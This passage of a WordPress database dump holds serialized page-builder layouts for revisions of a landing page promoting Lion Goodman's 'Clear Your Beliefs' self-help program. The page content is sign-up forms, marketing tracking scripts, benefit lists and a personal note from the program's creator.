want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1306, 1767, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2022:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1161:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important; width:100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1307, 1768, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2076:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1204:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top:-10px !important; width:100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"</div>\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 18px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<form style="position: relative; bottom: -90px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" class="infusion-form rd-form-1" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit&#a;&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script></center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1308, 1769, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1448:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script 